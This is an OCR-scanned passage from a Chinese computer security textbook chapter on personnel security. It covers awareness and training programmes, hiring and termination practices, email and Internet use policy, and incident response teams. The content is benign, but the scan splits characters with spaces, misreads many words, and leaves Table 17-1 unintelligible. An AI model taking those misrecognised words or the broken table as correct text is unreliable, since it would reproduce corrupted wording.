漏洞 、 安 全 防护 措施 有 深入 的 了 解 。 模 型 的 最 高 层 主 要 针对 IT 系统 中 的 核心 人 员 ， 例 如 程序 
员 ， 维 护 和 管理 IT 设备 的 人 员 ， 以 及 负责 IT 安全 的 人 员 。 





意识 


图 17-1 信息 技术 (IT) 持续 性 学 习 


NIST SP 800-16 (信息 技术 安全 培训 要 求 : 基于 角色 和 性 能 的 模型 ，1998 年 4 月 ) 总 结 为 
如 下 4 层 : 
e 安全 意识 (Security Awareness) 显然 是 所 有 员工 应 该 具备 的 ， 而 那些 与 IT 系统 有 关 的 
员工 则 要 求 具备 更 多 的 安全 基础 知识 和 素养 。 在 当前 的 环境 下 ,组 织 内 几乎 所 有 的 人 
都 需要 具备 后 面 提 到 的 安全 基础 知识 和 素养 。 
e 安全 基础 知识 和 素养 (Security Basics and Literacy) 是 安全 意识 和 培训 之 间 的 过 渡 阶 段 。 


RITE AJARA 375 


它 提 供 了 一 个 有 关 关 键 安全 术语 和 概念 的 通用 基线 ， 从 而 为 后 续 的 培训 提供 了 基础 。 
© 在 安全 基础 知识 和 素养 的 培训 之 后 ， 培 训 的 重点 开始 集中 在 针对 与 IT 系统 相关 的 职能 
人 员 和 责任 人 (Functional Role and Responsibility Relative to IT System) 提供 相应 的 知 
识 、 技 巧 和 能 力 。 在 这 一 层 ， 培 训 需 要 分 清 初级 、 中 级 、 高 级 之 间 不 同 的 技能 要 求 。 
e 教育 和 经 验 层 把 重点 集中 在 发 展 员工 对 比较 复杂 、 多 学 科 的 问题 的 解决 能 力 ， 拓 展 员 工 
的 视野 ， 深 和 学习 IT 安全 专业 知识 所 需要 的 技巧 ， 以 及 跟 上 安全 威胁 和 技术 变化 的 步伐 。 
表 17-1 说 明了 意识 、 培 训 和 教育 之 间 的 一 些 差别 。 下 面 我 们 就 逐一 探讨 。 


表 17-1 比较 框架 











级 别 =a 知识 洞察 力 
理论 教学 
l ie 
vo tox | Tea 
。 动 手 实践 
判断 对 /7 错 7 

cs 解决 问题 评论 

测试 方法 多 项 选择 (应 用 学 到 的 知识 ) (解释 学 到 的 知识 ) 






( 找 出 学 到 的 知识 ) 


17.1.3 意识、 基础 知识 和 素养 


一 般 来 说 ， 增 强 安 全 意识 的 项 目 目的 在 于 告知 员工 并 使 其 将 注意 力 集中 在 组 织 内 部 的 安 
全 问题 上 。 鉴 于 IT 在 组 织 中 的 广泛 使 用 ， 此 类 项 目 可 能 包括 安全 基础 知识 (basics) 和 素养 
(literacy) 要 素 。 增 强 安全 意识 有 望 得 到 以 下 几 个 方面 的 益处 : 

1. 使 员工 意识 到 他 们 对 维护 安全 的 责任 及 为 了 安全 需要 约束 他 们 的 行为 ， 并 依 此 开展 
工作 。 

2. 使 用 户 懂得 安全 对 于 一 个 组 织 健康 运作 的 重要 性 。 

3. 因为 不 断 出 现 的 新 威胁 所 造成 的 阻碍 ， 所 以 客户 的 支持 、IT 员工 的 热情 和 引进 的 管理 
是 很 关键 的 ， 并 且 可 以 通过 安全 意识 项 目 得 以 提升 。 

增强 安全 意识 项 目的 内 容 必 须 适 应 组 织 的 需求 ， 并 适应 所 培训 的 人 和 群 。 这 些 人 和 群 不 仅 包 
括 经 理 、IT 专业 人 员 及 IT 用户 ,还 包括 与 信息 系统 稍 有 联系 甚至 没有 联系 的 员工 。NIST SP 
800-100 描述 了 安全 意识 项 目的 内 容 ， 概 括 如 下 : 


安全 意识 工具 是 用 来 提升 信息 安全 的 ， 并 通过 解释 什么 是 安全 的 而 不 是 怎样 才 安 全 ， 以 
及 哪些 是 允许 传送 的 和 哪些 是 不 允许 传送 的 ， 来 告知 用 户 那 些 影响 他 们 公司 (或 部 门 ) 和 个 人 
工作 环境 的 安全 威胁 和 小 洞 。 安 全 意识 不 仅 传达 了 信息 安全 所 要 遵循 的 策略 和 程序 ， 而 且 也 为 
制裁 和 惩罚 违规 行为 提供 了 基础 。 安 全 意识 被 用 来 解释 使 用 公众 服务 机 构 的 信息 系统 和 信息 的 
行为 规则 ， 并 建立 了 信息 和 信息 系统 的 可 接受 使 用 的 期 望 级 别 。 


安全 意识 训练 项 目 必 须 不 断 地 以 各 种 方式 向 员工 宣传 安全 知识 。 这 类 训练 可 以 通过 开展 各 
种 各 样 的 活动 和 使 用 题材 广泛 的 资料 进行 宣传 。 包 括 使 用 宣传 资料 (如 海报 、 和 备忘录、 实时 通 





信和 传单 等 )， 详 细 地 介绍 安全 策略 和 相关 法 案 的 关键 方面 和 内 容 ， 日 积 月 累 地 提高 员工 的 安 
全 意识 ; 也 包括 为 员工 组 织 提 供 所 需 信息 的 各 种 研讨 会 和 培训 会 议 。 这 些 通常 可 能 被 纳入 有 关 
组 织 实践 和 系统 的 培训 程序 中 。 一 些 标准 鼓励 使 用 与 组 织 的 系统 和 信息 技术 相关 的 良好 实践 的 
实例 。 越 是 相关 和 易于 效仿 的 规程 ， 越 是 可 能 易于 依照 其 执行 并 达到 安全 。 合 适 的 安全 意识 研 
讨 会 也 应 纳入 癌 组 织 介绍 新 员工 的 环节 。 应 当 定 期 举行 安全 意识 研讨 会 以 帮助 员工 更 新 安全 知 
识 和 了 解 新 的 安全 问题 。 

[SZUB98] 提供 了 一 个 有 用 的 安全 意识 项 目的 目标 列表 ， 如 下 所 示 : 

目标 1: 全 面 提升 员工 对 信息 技术 安全 问题 的 认识 。 

目标 2: 确保 员工 了 解 当 地 、 州 、 联 邦 政府 关于 保密 和 安全 的 政策 法 规 。 

目标 3: 解释 说 明 机 构 的 安全 策略 和 实施 程序 。 

目标 4: 使 员工 懂得 安全 需要 团队 的 努力 ， 要 实现 安全 目标 每 个 人 都 很 重要 。 

目标 5: 通过 培训 使 员工 能 够 承担 他 们 的 工作 岗位 所 具有 的 特殊 的 安全 责任 。 

目标 6: 告知 员工 安全 活动 会 被 监视 。 

目标 7: 提醒 员工 ， 违 反 安 全 规则 应 承担 责任 。 

目标 8 : 使 员工 知道 报告 潜在 的 或 已 经 发 生 的 安全 事故 和 漏洞 是 负责 的 行为 而 且 是 有 必要 

的 〈 而 不 是 揭 乱 立 事 的 行为 )。 

目标 9: 使 员工 相信 建立 一 个 可 信 的 系统 是 可 以 实现 的 。 

为 巩固 对 安全 重要 性 的 认识 ， 机 构 应 该 向 每 个 员工 提供 一 份 安全 意识 的 策略 文档 。 该 文档 
应 该 确立 下 列 三 件 事 : 

1. 要 求 所 有 员工 都 参与 到 加 强 安 全 意识 的 项 目 中 ， 包 括 针 对 新 员工 的 介绍 性 项 目 和 定期 举 
办 的 增强 安全 意识 的 活动 。 

2. 要 给 予 每 个 人 充足 的 时 间 ， 使 其 参与 到 增强 安全 意识 的 活动 中 。 

3. 明确 说 明 管 理 和 举办 增强 安全 意识 活动 的 责任 。 

信息 安全 论坛 (Information Security Forum) [ISF13] 中 ,《 信 息 安 全 优秀 实践 标准 》( The 
Standard of Good Practice for Information Security) 提供 了 一 个 全 面 的 、 详 细 的 安全 意识 所 需 考 
虑 事项 的 列表 。 这 些 材料 被 重 现在 文档 SecurityPolicy. pdf 的 第 3 部 分 中 ， 可 从 https: //app.box. 
com/v/CompSec4e 中 获得 。 

当前 安全 意识 项 目的 一 个 关键 要 素 是 解决 高 水 平 的 社会 工程 学 和 钓鱼 攻击 ， 我 们 在 第 6 章 
中 已 进行 了 讨论 。 防 御 这 些 攻击 的 最 佳 方法 是 增强 员工 对 于 此 类 攻击 的 意识 ， 并 让 他 们 了 解 此 
类 攻击 的 形式 ， 使 员工 通过 增强 安全 意识 的 方式 意识 到 并 抵御 这 些 攻击 。 一 个 好 的 安全 意识 项 
目 会 涉及 这 些 攻击 如 何 发 生 、 采 取 的 形式 和 共同 特征 等 内 容 ， 例 如 对 请 求 一 个 信息 或 要 求 安装 
某 些 软件 时 的 紧急 响应 。 安 全 意识 项 目 将 鼓励 员工 认识 到 这 些 攻击 ， 并 花 时 间 从 组 织 的 可 信 源 
中 搜寻 有 关 这 些 请 求 是 否 合法 的 分 类 信息 。 进 一 步 讲 ， 该 计划 还 可 能 包括 模拟 攻击 ， 以 提供 更 
多 的 信息 ， 说 明 哪 些 方法 更 有 可 能 成 功 ， 因 此 需要 在 意识 项 目 中 更 加 重视 ， 并 对 能 够 从 中 获 益 
的 工作 人 员 进 行 有 关 这 些 威 胁 的 更 多 信息 和 知识 的 指导 。 


17.1.4 培训 


一 个 安全 培训 项 目 ， 其 设计 目标 是 教会 人 们 如 何 更 加 安全 地 从 事 与 信 息 系 统 相 关 的 工作 。 
培训 教会 人 们 应 该 做 什么 ， 应 该 怎么 做 。 根 据 每 个 使 用 者 的 角色 不 同 ， 培 训 也 涵盖 了 从 基本 的 
电脑 技巧 到 高 级 的 特殊 技巧 各 个 层次 的 内 容 。 

对 于 一 般 的 用 户 ， 培 训 集 中 于 良好 的 计算 机 安全 实践 ， 包 含 以 下 内 容 : 

© 保护 设备 和 设备 所 在 的 物理 区 域 (例如 ， 锁 上 门 ， 保管 好 CD-ROM, DVD 和 可 移 USB 
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存储 设备 )。 
e 保护 好 口令 (如 果 有 的 话 ) 或 者 其 他 的 认证 数据 或 令 牌 (如 从 不 泄露 PIN )。 
© 报告 安全 违规 行为 或 事件 (例如 ， 如 果 计 算 机 行为 失常 ， 且 极 有 可 能 是 病毒 导致 的 ， 
那么 应 该 回 谁 求助 )。 
o 识别 可 能 的 可 疑 钓 鱼 或 垃圾 邮件 及 其 附件 ， 知 道 如 何 解 决 它们 ， 以 及 该 向 谁 寻求 帮助 。 
程序 员 、 开 发 者 和 系统 维护 者 需要 接受 更 加 特别 或 高 级 的 培训 。 这 一 类 员工 对 于 建立 和 维 
护 计算 机 安全 特别 重要 。 尽 管 如 此 ， 很 少 有 程序 员 或 者 开发 者 懂得 如 何 对 他 们 开发 或 者 维护 的 
软件 进行 安全 防护 。 通 常 开发 者 不 会 把 安全 机 制 加 到 他 们 的 程序 中 ,或 者 他 们 不 知道 怎么 增加 
安全 机 制 ， 有 时 他 们 甚至 抵制 安全 专家 的 批评 。 为 这 一 类 人 设置 的 培训 内 容 应 该 包含 如 下 几 个 
方面 : 
e 培养 开发 人 员 的 安全 意识 。 
e 使 用 定义 明确 的 检查 点 ， 回 开发 人 员 展 示 怎 样 将 安全 机 制 添 加 到 开发 生命 周期 中 。 
e 使 开发 人 员 清 楚 攻击 者 是 如 何 利用 软件 进行 攻击 的 ， 并 教会 他 们 如 何 防 御 攻击 。 
e 为 分 析 员 提供 一 个 包括 特定 攻击 和 原理 的 工具 包 ， 使 用 它 来 检测 系统 。 
管理 层 (management-level) 培训 应 该 教会 软件 开发 管理 人 员 在 面临 与 安全 相关 的 风险 、 成 
本 和 利益 时 怎样 做 出 权衡 。 管 理 人 员 需 要 理解 开发 周期 并 使 用 安全 检查 点 和 安全 评估 技术 。 
行政 层 ( executive-level) 培训 必须 解释 软件 安全 和 网 络 安全 的 区 别 ， 特 别 是 软件 安全 事件 
的 普遍 性 。 行政 人 员 需 要 培养 对 安全 风险 和 成 本 的 理解 。 这 类 人 员 需 要 在 以 下 几 个 方面 接受 培 
训 : 风险 管理 的 目标 、 风 险 测量 的 方法 、 在 安全 意识 方面 以 身 作 则 为 员工 树立 典范 。 
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最 为 全 面 和 深入 的 项 目 是 安全 教育 。 安 全 教育 面向 的 人 群 是 安全 专业 人 员 和 在 工作 中 需要 
专门 安全 技术 的 人 员 。 通 常 ， 在 大 多 数组 织 的 安全 意识 和 培训 项 目 中 不 包括 安全 教育 。 安 全 教 
育 更 适合 于 作为 员工 职业 发 展 项 目 。 通 常情 况 下 ， 这 种 类 型 的 教育 是 由 外 部 资源 (如 大 学 课程 
或 者 特殊 的 培训 项 目 ) 提供 的 。 


17.2 雇用 实践 和 策略 


本 市 讨论 员工 的 安全 问题 包含 招聘 、 培 训 、 监 视 行 为 和 处 理 离职 事务 。[SADO03] 报道 
说 ， 大 部 分 重大 计算 机 案件 的 作案 人 员 都 是 能 够 合法 访问 或 者 最 近 合法 访问 过 的 个 人 。 因 此 ， 
管理 拥有 隐 含 访问 权 的 个 人 是 信息 安全 的 一 个 重要 部 分 。 

员工 能 够 通过 两 种 方式 参与 安全 违规 事件 。 有 些 员 工 不 经 意 地 卷 人 了 安全 违规 事件 ， 主 要 
的 方式 有 : 没有 遭 循 合理 的 程序 ， 忘 记 安 全 方面 的 注意 事项 ， 或 者 没有 意识 到 他 们 正在 制造 一 
个 洗 润 。 有 些 员 工 有 意识 地 违反 控制 措施 或 实施 程序 去 制造 或 者 助长 安全 违规 事件 。 

来 目 内 部 员工 的 威胁 主要 包含 : 

© 获得 非 授 权 的 访问 或 者 帮助 他 人 获得 非 授权 的 访问 。 

© 修改 数据 。 

e 删除 生产 和 备份 数据 。 

ERRI. 

毁坏 系统 。 

为 了 个 人 利益 或 为 了 破坏 机 构 而 滥用 系统 。 

持 有 作为 要 挟 条 件 的 数据 。 

为 商业 间谍 活动 或 欺诈 计划 盗 取 战 略 数据 或 用 户 数据 。 
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17.2.1 招聘 过 程 的 安全 


ISO 27002 列举 了 在 招聘 过 程 中 的 安全 目标 : 确保 员工 、 承 包 商 和 第 三 方 用 户 清楚 他 们 的 
责任 ， 确 保 为 他 们 所 考虑 的 角色 是 合适 的 ， 并 且 减 少 偷窃 、 其 骗 和 设备 误 用 的 风险 。 虽 然 在 这 
一 节 我 们 主要 关注 的 是 员工 ， 但 是 ， 也 需要 对 承包 商 和 第 三 方 用 户 进行 同样 的 考虑 。 

背景 审查 和 考察 ”从 安全 的 角度 来 考虑 ， 招 聘 行为 给 管理 带 来 巨大 的 挑战 。[KABA14] 指 
出 越 来 越 多 的 证 据 证 明 ， 许 多 人 用 毫 无 依据 的 言辞 来 夸大 他 们 的 简历 。 前 任 和 雇主 的 沉默 态度 使 
这 种 问题 越 来 越 复 杂 。 雇 主 在 面 对 无 竞争 力 的 人 、 表 现 不 佳 或 者 缺乏 职业 道德 的 人 时 给 出 不 好 
的 评价 可 能 会 比较 犹 殉 ， 因 为 雇主 害怕 他 们 的 评论 被 公众 知道 后 会 遭 到 员工 控诉 或 者 导致 员工 
无 法 找到 新 的 工作 。 另 一 方面 ， 前 任 雇主 如 果 对 一 个 员工 给 予 了 和 良好 的 评价 ， 但 该 员工 在 接 下 
来 的 岗位 中 出 了 问题 ， 前 任 雇主 可 能 会 遭 到 新 雇主 的 指控 。 因 此 ， 许 多 雇主 之 间 达 成 了 一 个 默 
契 : 绝对 不 以 任何 形式 讨论 前 员工 在 工作 中 的 表现 ， 无 论 是 肯定 的 还 是 否定 的 评价 。 雇 主 也 会 
限制 雇用 时 间 和 职位 信息 的 泄露 。 

尽管 存在 这 些 障碍 ， 雇 主 必 须 尽 最 大 的 努力 对 申请 人 进行 背景 审查 和 考察 。 当 然 ， 这 些 考 
察 是 为 了 确保 未 来 的 员工 能 胜任 计划 中 的 工作 ， 并 且 没 有 安全 风险 。 另 外 ,雇主 需要 了 解 在 一 
些 司法 权 中 “雇用 过 失 ” 的 概念 。 因 此 ， 如 果 员 工 对 第 三 方 (个 人 或 者 公司 ) 造成 损害 ,雇主 
就 可 能 因为 “雇用 过 失 ” 而 负 法 律 责任 。 

审查 申请 人 的 一 般 指 导 原 则 ， 包 括 以 下 几 个 方面 : 

e 尺 可 能 详尽 地 询问 申请 人 的 工作 经 历 和 教育 经 历 。 询 问 到 的 细节 越 多 ， 申 请 人 如 果 说 

谎 ， 则 保持 说 话 前 后 一 致 性 的 难度 越 大 。 

o 尽 可 能 理性 地 分 析 细 节 的 真实 性 。 

e 安排 有 经 验 的 员工 面试 候选 人 ， 讨 论 其 中 形成 的 差异 。 

对 于 高 度 敏感 的 职位 ， 需 要 更 加 精细 的 调查 。[SADO03] 给 出 了 下 面 的 例子 来 说 明 在 一 些 
环境 中 哪些 东西 需要 得 到 保证 : 

e 聘请 调查 代理 机 构 做 背景 审查 。 

e 检查 个 人 的 犯罪 记录 。 

e 检查 申请 人 的 信用 卡 记录 ， 检 查 是 否 有 大 笔 个 人 债务 并 且 无 力 支付 。 如 果 你 发 现 这 样 

的 记录 ， 就 跟 申请 人 讨论 其 中 的 问题 。 一 般 ， 处 于 债务 中 的 人 不 应 该 被 拒绝 ， 如 果 他 
们 被 拒绝 ， 他 们 将 无 力 获得 偿付 能 力 。 同 时 应 该 和 注意， 生活 持 据 的 员工 更 可 能 有 不 合 
适 的 举动 。 

e 考虑 对 申请 人 进行 测 谎 (如 果 合 法 的 话 )。 虽 然 测 谎 仪 测试 并 不 总 是 精确 的 ， 但 如 果 你 

正在 为 一 个 特别 重要 的 职位 招聘 员工 ， 这 种 测试 还 是 很 有 帮助 的 。 

e 让 申请 人 明确 他 或 者 她 的 职位 的 权限 范围 。 

对 于 许多 员工 来 说 ， 这 些 步骤 是 多 余 的 。 尽 管 如 此 ， 雇 主 需要 对 将 要 处 于 信任 职位 或 者 具 
有 访问 特权 的 员工 进行 额外 的 检查 一 一 包含 维修 和 清洁 人 员 。 

雇用 协议 ”作为 合同 义务 的 一 部 分 ， 员 工 应 该 同意 雇用 协议 上 有 关 他 们 和 机 构 的 信息 安全 
责任 的 条 款 并 签名 。 该 雇用 协议 应 该 包括 保密 和 不 可 公开 协议 ， 这 个 协议 详细 说 明 机 构 的 信息 
资产 是 机 密 的 ， 除 非 以 其 他 的 方式 指明 不 是 机 密 信息 ， 并 且 员 工 应 该 保护 这 些 机 密 。 雇 用 协议 
也 应 该 参考 机 构 的 安全 策略 ， 并 表明 员工 已 经 知道 并 且 同 意 遵 守 该 策略 。 


17.2.2 ”雇用 期 间 的 安全 


ISO 27002 对 当前 的 员工 列举 出 以 下 的 安全 目标 : 确保 员工 、 承 包 商 和 第 三 方 用 户 能够 意 
识 到 信息 安全 的 威胁 ， 明 确 他 们 在 维护 信息 安全 过 程 中 的 责任 ， 在 日 常 工作 中 遵守 机 构 的 安全 
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在 雇用 期 间 ， 有 关 人 员 安 全 的 两 个 重要 因素 是 ， 对 员工 正在 进行 的 安全 意识 与 培训 项 目 ， 
以 及 电子 邮件 和 Internet 使 用 策略 ， 正 如 我 们 在 本 章 中 所 讨论 的 。 

除了 以 一 致 和 公平 的 方式 加 强 安全 策略 之 外 ， 对 于 人 员 安 全 需要 遵循 以 下 一 些 原则 : 

o 最 小 特权 ( least privilege): 根据 员工 所 做 的 工作 给 予 他 最 小 的 访问 权限 。 这 种 受 限制 


的 访问 既 包含 逻辑 方面 的 (账号 、 网 络 和 程序 的 访问 )， 也 包含 物理 方面 的 (计算 机 、 
备份 磁带 和 其 他 外 部 设备 的 访问 )。 如 果 每 个 用 户 都 能 访问 所 有 的 系统 并 且 能 够 与 任何 
设备 进行 物理 连接 ， 这 样 所 有 的 员工 在 威胁 的 级 别 上 就 基本 一 样 了 。 

责任 划分 (separation of duty) : 对 责任 进行 仔细 的 划分 ， 这 样 才能 够 使 那些 负责 检查 不 
合理 使 用 的 职员 减少 自己 不 恰当 使 用 的 机 会 。 因 此 ， 把 所 有 安全 和 审计 责任 放 在 一 个 
人 身上 是 危险 的 。 这 种 实践 会 导致 这 样 一 种 情况 : 这 个 人 违反 了 安全 策略 或 者 执行 了 
被 禁止 的 行为 ， 但 是 没有 人 来 查看 审计 并 进行 警示 。 

对 关键 员工 有 限 的 依赖 (limited reliance on key employee): 在 一 个 机 构 中 没有 人 
是 不 可 替代 的 。 如 果 你 的 机 构 依 靠 一 个 关键 员工 在 开展 工作 ， 那 么 你 的 机 构 就 有 风 
险 了 。 机 构 不 可 能 没有 关键 员工 。 但 为 了 安全 ， 机 构 必 须 考 虑 到 该 关键 员工 出 现 不 
可 预料 的 疾病 或 者 离职 的 情况 ， 要 为 此 预先 制定 安全 策略 和 计划 。 对 于 系统 来 说 ， 
在 员工 的 结构 中 应 该 建立 一 定 的 元 余 机 制 。 专 门 技 能 或 者 专门 知识 不 能 仅 由 一 人 
掌握 。 


17.23 ”员工 离职 过 程 的 安全 


ISO 27002 对 于 员工 的 离职 列举 了 以 下 的 安全 目标 : 确保 员工 、 承 包 商 和 第 三 方 用 户 能 够 
以 规定 的 方式 离开 机 构 或 者 改变 职位 ， 返 还 机 构 所 有 的 设备 并 撤销 其 访问 权限 。 
离职 的 过 程 很 复杂 ， 主 要 受 机 构 的 性 质 、 员 工 在 机 构 中 的 地 位 、 离 职 的 原因 等 因素 的 影 
从 安全 角度 来 说 ， 以 下 的 措施 是 很 重要 的 : 


Ml s 


将 这 个 人 名 字 从 所 有 授权 访问 列表 中 清除 。 

明确 地 通知 保安 ， 离 职 的 员工 在 没有 正式 员工 的 特别 授权 下 不 许 进入 办 公 区 域 。 
清除 离职 人 员 的 所 有 访问 代码 。 

如 果 必 要 ， 改 变 锁 的 组 合 方式 ， 重 写 访 问 卡 系统 的 程序 ， 更 换 物 理 锁 。 

收回 机 构 所 有 的 资产 ,包含 员工 ID 、 硬 盘 、 文 档 和 设备 。 

用 便签 或 电子 邮件 的 方式 告知 适当 的 部 门 。 


17.3 ”电子 邮件 和 Internet 使 用 策略 


在 办 公 环 境 中 ， 为 绝 大 多 数 甚 至 所 有 员工 提供 电子 邮件 和 Internet 服务 是 很 常见 的 。 同 时 
在 其 他 环境 中 也 会 有 选择 地 给 部 分 员工 提供 这 些 服 务 ， 比 如 工厂 员工 。 越 来 越 多 的 公司 法 人 把 
电子 邮件 和 Internet 使 用 策略 加 入 到 机 构 安 全 策略 文档 中 。 本 节 我 们 讨论 制定 这 些 策 略 应 该 考 
虑 的 问题 。 


17.3.1 


动机 


员工 广泛 地 使 用 电子 邮件 和 Intemet， 引 起 了 雇主 对 员工 的 一 些 关 注 ， 主 要 涉及 以 下 几 个 方面 : 


1. 在 明确 规定 的 工作 时 间 ， 员 工 可 能 从 事 与 工 作 无 关 的 活动 ， 比 如 ， 网 上 冲浪 、 网 上 洲 


、 网 上 购物 、 网 上 聊天 和 网 上 收发 个 人 电子 邮件 。 
2. 使 用 重要 的 计算 机 和 通信 资源 从 事 与 工 作 无 关 的 活动 ,使 开 资源 原来 的 设计 能 力 大 打折 扣 。 


3. 过 多 地 和 随意 地 使 用 Internet 和 电子 邮件 ， 会 不 必要 地 增加 恶意 软件 进入 机 构 IT 环境 的 


4. 员工 从 事 与 工作 无 关 的 活动 可 能 会 对 机 构 外 的 机 构 和 个 人 有 害 ， 因 此 使 机 构 承 担 责 任 . 
5. 电子 邮件 和 Internet 可 能 会 被 员工 用 来 驿 扰 其 他 员工 。 
6. 员工 不 适当 的 在 线 活动 可 能 损毁 机 构 的 声誉 。 


17.3.2 策略 问题 


开发 一 个 完善 的 电子 邮件 和 Internet 使 用 策略 会 导致 许多 策略 问题 。 以 下 是 基于 [KING06] 
的 一 些 策略 建议 。 


仅 供 业务 使 用 (business use only): 员工 只 有 在 执行 公司 事务 时 ， 才 能 使 用 公司 提供 的 
电子 邮件 和 Internet 服务 。 

策略 范围 (policy scope): 策略 涉及 电子 邮件 访问 、 电 子 邮 件 信 息 内 容 、Internet 和 企业 
内 部 网 通信 ， 以 及 电子 邮件 、Internet 和 企业 内 网 通信 的 记录 。 

内 容 所 有 权 (content ownership): 电子 通信 设备 、 文 件 、 数 据 是 公司 的 财产 ， 即 使 该 文 
件 或 者 数据 传送 到 公司 外 的 设备 。 


o 隐私 (privacy): 员工 在 使 用 公司 提供 的 Intemet 和 电子 邮件 访问 时 ， 应 该 不 涉及 个 人 隐私 . 
© 行为 标准 (standard of conduct): 在 使 用 公司 提供 的 邮件 和 Internet 访问 时 ， 员 工 应 该 且 


有 良好 的 判断 力 ， 礼 貌 和 专业 地 使 用 。 

合理 的 个 人 使 用 (reasonable personal use): 在 不 有 那 于 员工 的 职责 ， 不 违反 公司 的 策 
略 ， 或 者 在 不 过 度 加 重 公司 设备 负担 的 前 提 下 ， 员工 可 以 使 用 公司 提供 的 电子 邮件 和 
Internet 访问 来 处 理 个 人 事务 。 

禁止 非法 活动 ( unlawful activity prohibited): 员工 不 能 利用 公司 提供 的 电子 邮件 和 
Internet 访问 从 事 具 有 非法 目的 的 活动 。 

安全 策略 (security policy): 在 使 用 电子 邮件 和 Internet 访问 时 ， 员 工 应 该 遵守 公司 的 安 
全 策略 。 

公司 策略 (company policy); 员工 在 使 用 电子 邮件 和 Internet 访问 时 ， 应 该 遵守 公司 的 
其 他 政策 。 公 司 政策 包括 : 禁止 观看 、 存 储 和 传播 色情 文学 ; 然 止 制作 和 传播 双 扰 性 
和 靶 视 性 的 信息 ; 禁止 未 经 授权 泄露 机 密 和 私有 信息 。 

公司 权利 (company right): 公司 可 以 访问 、 监 视 、 拦 截 、 阻 止 访问 、 检 查 、 复 制 、 

露 、 使 有 用、 毁坏、 利用 计算 机 取得 的 证 据 进行 恢复 或 保留 通信 内 容 、 re 
盖 的 其 他 数据 。 员 工 在 请 求 时 需要 提供 相应 的 口令 。 

纪律 处 分 (disciplinary action); 违反 这 些 策 略 ， 相 关 责 任 人 会 立即 被 中 止 雇佣 关系 或 者 
承受 公司 相应 的 其 他 处 罚 。 


17.3.3 制定 策略 的 指南 


2004 年 7 月 发 行 的 机 构 电 子 邮 件 和 Internet 使 用 策略 开发 指南 (Guidelines to Agencies in 
Developing Email and Internet Use Polices) 是 制定 电子 邮件 和 Internet 使 用 策略 的 一 个 有 用 的 帮 
助 文档 。 该 指南 源 自 西 澳大利亚 政府 (Government of Western Australia) 的 电子 政务 办 公 室 。 从 


17.4 


box.com/CompSec4e 上 可 以 找到 该 指南 的 一 个 副本 。 


计算 机 安全 事件 响应 团队 


有 关 计 算 机 事件 响应 规程 的 开发 ， 被 大 多 数组 织 视 为 其 基本 控制 中 不 可 或 缺 的 部 分 。 大 部 
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分 组 织 或 多 或 少 都 将 会 发 生 某 种 形式 的 安全 事件 。 通 常情 况 下 ， 大 多 事件 对 组 织 产 生 的 影响 较 
小 ， 但 是 有 时 也 会 出 现 一 些 较为 严重 的 事件 。 事 件 处 理 以 及 啊 应 规程 需要 反映 出 该 事件 对 组 织 
可 能 产生 后 果 的 范围 ， 并 会 考虑 一 个 恰当 的 响应 。 通 过 提前 建立 适当 的 规程 ， 组 织 可 以 消除 当 
员工 在 意识 到 出 现 问 题 却 不 知 如 何 进 行 最 好 的 啊 应 时 而 产生 的 想 慌 。 

对 于 大 中 型 组 织 而 言 ， 计 算 机 安全 事件 响应 团队 ( CSIRT) 主要 负责 快速 检测 事件 ， 最 大 
限度 地 减少 损失 和 破坏 ， 消 除 可 以 被 利用 的 漏洞 ， 并 恢复 计算 机 服务 。 

NIST SP 800-61 (计算 机 安全 事件 处 理 指南 ，2012 年 8 月 ) 列 出 了 组 织 有 事件 响应 能 力 会 
有 了 哪些 益处 : 

e 有 计划 地 对 事件 做 出 啊 应 ， 以 便 采 取 合 理 的 步骤 。 

。 帮助 员 工 快速 有 效 地 解决 安全 事件 ， 最 大 限度 地 减少 损失 或 被 盗 取 的 信息 对 服务 的 

破坏 。 
e 运用 事件 处 理 过 程 中 得 到 的 信息 ， 为 日 后 更 好 地 处 理事 件 做 准备 并 为 相关 系统 和 数据 
提供 强 有 力 的 保护 。 

e 妥善 处 理事 件 发 生 时 可 能 出 现 的 法 律 问题 。 

考虑 一 个 组 织 感染 了 大 量 邮件 蜂 虫 的 情形 ， 近 些 年 此 类 事件 频繁 发 生 。 蠕 虫 通常 先 发 气 
普通 桌面 应 用 程序 中 未 打 补丁 的 安全 漏洞 ， 然 后 通过 电子 邮件 传播 到 被 感染 系统 已 知 的 其 他 地 
址 。 由 此 产生 的 流量 足以 削弱 企业 局 域 网 和 Internet 服务 。 面 临 这 些 影响 时 ， 显 而 易 见 的 响应 
就 是 切断 企业 与 外 部 网 络 的 连接 ， 或 者 关闭 内 部 电子 邮件 系统 。 然 而 ， 这 一 决定 可 能 会 对 组 织 
的 一 些 运营 事 务 造 成 严重 影响 ， 而 这 些 事务 可 能 相 比 阻 断 感 染 的 传播 更 为 重要 ， 因 此 必须 有 一 
个 平衡 决策 。 当 检测 到 发 生 这 类 事件 时 ， 直 接 参与 的 人 员 可 能 并 没有 掌握 对 组 织 运 转 做 出 关 
键 性 决定 所 需 的 信息 。 一 个 很 好 的 事件 响应 策略 应 该 根据 事件 严重 程度 指出 所 要 采取 的 措施 ; 
也 应 指定 适当 的 人 员 在 一 些 重大 问题 发 生 时 负责 做 出 决定 ， 并 明确 如 何 联系 这 些 人 以 便 进 行 
决策 。 

有 许多 事件 可 以 被 视 为 安全 事件 。 事实 上 ， 任 何 一 个 威胁 到 一 个 或 多 个 传统 的 安全 服务 系 
统 的 机 密 性 、 完 整 性 、 可 用 性 、 可 说 明 性 、 真 实 性 和 可 靠 性 的 行为 都 可 以 被 看 作 是 一 个 安全 事 
件 。 这 其 中 包括 各 种 形式 的 对 系统 未 经 授权 的 访问 ， 以 及 对 系统 信息 未 经 授权 的 修改 。 个 人 对 
系统 未 经 授权 的 访问 具体 包括 : 

e 获取 无 权 查 看 的 信息 。 

e 获取 信息 后 将 其 传递 给 男 一 个 无 权 查 看 该 信息 的 人 。 

e 试图 绕 过 系统 实施 的 访问 机 制 对 其 进行 访问 。 

e 出 于 某 种 目的 使 用 他 人 的 用 户 ID 及 口令 。 

e 在 未 授权 的 情况 下 ， 试 图 拒绝 他 人 对 系统 进行 访问 。 

个 人 对 系统 信息 未 授权 的 修改 包括 : 

e 试图 毁坏 对 他 人 有 价值 的 信息 。 

e 在 未 经 授权 的 情况 下 ， 试 图 对 信息 及 资源 进行 修改 。 

e 以 未 经 授权 的 方式 处 理 信 息 。 

管理 安全 事件 涉及 的 处 理 规程 和 控制 指出 [CARN03]: 

e 检测 潜在 的 安全 事件 。 

e 对 即将 面临 的 事件 报告 进行 排序 、 分 类 、 优 先 级 处 理 。 

o 对 安全 违规 事件 进行 识别 并 做 出 响应 。 

